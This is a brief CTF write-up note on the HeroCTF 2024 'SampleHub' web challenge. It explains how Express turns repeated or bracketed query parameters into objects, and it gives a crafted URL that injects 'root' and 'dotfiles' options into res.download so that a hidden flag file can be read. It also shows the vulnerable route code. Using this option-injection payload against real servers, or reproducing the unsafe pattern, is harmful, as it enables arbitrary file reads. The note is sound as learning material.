====== Express req.query Notes ======

Notes from **HeroCTF 2024** SampleHub **[WEB]**.

Given this code snippet:

<code javascript>
process.chdir(path.join(__dirname, "samples"));
app.get("/download/:file", (req, res) => {
    const file = path.basename(req.params.file);
    console.log(typeof req.query.filename);
    res.download(file, req.query.filename || "sample.png", (err) => {
        if (err) {
            res.status(404).send(`File "${file}" not found`);
        }
    });
});
</code>

req.query.filename (typeof) is string is request is something like:

<code>
http://localhost:3000/download/whatever?filename=first
</code>

But req.query.filename (typeof) is object is request is something like:

<code>
http://localhost:3000/download/whatever?filename=first&filename=second
</code>

We can also inject object properties like this:

<code>
http://localhost:3000/download/.flag.txt?filename[root]=/&filename[dotfiles]=allow
</code>

req.query.filename type will also be object with something like:

<code>
filename[whatever]
</code>